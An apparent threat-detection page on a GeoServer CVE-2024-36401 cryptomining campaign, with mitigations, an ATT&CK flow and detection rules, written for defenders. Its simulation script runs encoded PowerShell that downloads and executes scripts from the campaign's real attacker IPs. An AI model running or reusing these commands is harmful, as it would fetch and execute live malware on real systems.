Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Threat actors are exploiting the GeoServer remote code execution flaw CVE-2024-36401 to deploy cryptocurrency miners and NetCat on unpatched servers. The activity relies on PowerShell, Bash, and certutil to download and launch XMRig from multiple malicious domains and IP addresses. Several downloader scripts and droppers are used, commonly packaged in ZIP archives and persisted as services through NSSM. The primary objective is to seize compute resources for unauthorized mining.
Investigation
The report outlines three variants (A, B, C) that use encoded PowerShell, Bash-based fetchers, and certutil to retrieve miner payloads from pool.supportxmr.com and multiple aaaaaaaaa.cyou subdomains. Delivery mechanisms include batch scripts, ZIP bundles, and a bespoke downloader named systemd, along with HTTP Basic authentication credentials. Analysts extracted key indicators—URLs, IP addresses, and file names—to support detection and scoping.
Mitigation
Apply GeoServer patches addressing CVE-2024-36401 and keep deployments on the latest supported release. Block outbound connections to known mining pools and related infrastructure, and monitor for suspicious encoded PowerShell or Bash executions. Limit certutil usage for non-admin contexts and enforce application allowlisting to prevent unauthorized services installed via NSSM.
Response
Implement detections for the observed command lines, hashes, and network indicators. Quarantine affected hosts, eradicate miner services and persistence artifacts, and run a forensic sweep for any secondary payloads. Rotate exposed credentials and require multi-factor authentication for administrative access.
"graph TB %% Class definitions classDef action fill:#ffcc99 %% Action/Technique nodes classDef builtin fill:#e0e0e0 %% Tool and builtu2011in utility nodes classDef malware fill:#ff9999 %% Malware nodes %% Node definitions tech_initial_access["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/>Description: Exploit CVEu20112024u201136401 in GeoServer for remote code execution"] class tech_initial_access action tool_geoserver["<b>Tool</b> – <b>Name</b>: GeoServer<br/><b>Vulnerability</b>: CVEu20112024u201136401"] class tool_geoserver builtin tech_execution_ps["<b>Technique</b> – <b>T1059.001 PowerShell</b><br/>Description: Run encoded PowerShell commands to download and launch malicious scripts"] class tech_execution_ps action tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell"] class tool_powershell builtin tech_obfuscation["<b>Technique</b> – <b>T1027 Obfuscated Files or Information</b><br/>Description: Base64u2011encode payloads delivered via certutil and Bash"] class tech_obfuscation action tool_certutil["<b>Tool</b> – <b>Name</b>: certutil"] class tool_certutil builtin tool_bash["<b>Tool</b> – <b>Name</b>: Bash"] class tool_bash builtin tech_deobfuscation["<b>Technique</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Description: Decode Base64 payloads on the host before execution"] class tech_deobfuscation action tech_defense_evasion["<b>Technique</b> – <b>T1562 Impair Defenses</b><br/>Description: Disable Windows Defender and add file/path exclusions"] class tech_defense_evasion action tool_windows_defender["<b>Tool</b> – <b>Name</b>: Windows Defender"] class tool_windows_defender builtin tech_persistence["<b>Technique</b> – <b>T1543.002 Create or Modify System Process: Systemd Service</b><br/>Description: Use NSSM to install XMRig as a persistent service"] class tech_persistence action tool_nssm["<b>Tool</b> – <b>Name</b>: NSSM (Nonu2011Sucking Service Manager)"] class tool_nssm builtin malware_xmrig["<b>Malware</b> – <b>Name</b>: XMRig<br/><b>Purpose</b>: Cryptocurrency mining"] class malware_xmrig malware tech_impact["<b>Technique</b> – <b>T1496.001 Compute Hijacking</b><br/>Description: Hijack CPU cycles to mine cryptocurrency"] class tech_impact action tech_indirect_execution["<b>Technique</b> – <b>T1202 Indirect Command Execution</b><br/>Description: PowerShell launches additional scripts via Bash and Netcat"] class tech_indirect_execution action tool_netcat["<b>Tool</b> – <b>Name</b>: Netcat"] class tool_netcat builtin %% Connections tool_geoserver –>|exploited for| tech_initial_access tech_initial_access –>|enables| tech_execution_ps tech_execution_ps –>|uses| tool_powershell tech_execution_ps –>|downloads via| tool_certutil tech_execution_ps –>|invokes| tool_bash tech_execution_ps –>|invokes| tool_netcat tool_certutil –>|delivers encoded payloads to| tech_obfuscation tool_bash –>|executes encoded payloads for| tech_obfuscation tech_obfuscation –>|requires| tech_deobfuscation tech_deobfuscation –>|prepares environment for| tech_defense_evasion tech_defense_evasion –>|disables| tool_windows_defender tech_defense_evasion –>|leads to| tech_persistence tech_persistence –>|uses| tool_nssm tool_nssm –>|installs| malware_xmrig malware_xmrig –>|performs| tech_impact tech_execution_ps –>|triggers| tech_indirect_execution tech_indirect_execution –>|uses| tool_bash tech_indirect_execution –>|uses| tool_netcat tech_indirect_execution –>|facilitates| malware_xmrig "
Attack Flow
Detections
Disabling Windows Defender Protections (via registry_event)
View
Windows Defender Preferences Suspicious Changes (via powershell)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
Schtasks Points to Suspicious Directory / Binary / Script (via cmdline)
View
Suspicious Files in Public User Profile (via file_event)
View
Download or Upload via Powershell (via cmdline)
View
IOCs (SourceIP) to detect: Malware Coin Miner Attack Cases Targeting GeoServer
View
IOCs (DestinationIP) to detect: Malware Coin Miner Attack Cases Targeting GeoServer
View
IOCs (HashMd5) to detect: Malware Coin Miner Attack Cases Targeting GeoServer
View
Detect Certutil Usage for Malicious Payload Download Exploiting GeoServer Vulnerabilities [Windows Process Creation]
View
Detect Encoded PowerShell Commands Targeting GeoServer Vulnerabilities [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An attacker has obtained a malicious Base64 payload that downloads a vulnerable GeoServer configuration file, executes it, and then drops a cryptocurrency miner. To evade simple script‑block detection, the attacker uses the-encswitch with a pre‑encoded string (one of the two known IOCs). The attacker runs the payload locally on a compromised Windows host, causing apowershell.exeprocess creation that includes the exact Base64 string the rule watches for. -
Regression Test Script:
# ------------------------------------------------- # Regression script to trigger the Sigma rule # ------------------------------------------------- # Payload 1 (matches first IOC) $b64_1 = 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMjIwLjg0LjEwNy42OS9qcy9ndy50eHQnKQA=' powershell.exe -enc $b64_1 # Payload 2 (matches second IOC) $b64_2 = 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8xMTkuMTk0LjE1My4zMTo4MDgwL2ljb24vanMvd2kudHh0Jyk=' powershell.exe -enc $b64_2 -
Cleanup Commands:
# ------------------------------------------------- # Cleanup – terminate any lingering PowerShell payloads # ------------------------------------------------- Get-Process -Name powershell -ErrorAction SilentlyContinue | Where-Object { $_.StartInfo.Arguments -match '-enc' } | Stop-Process -Force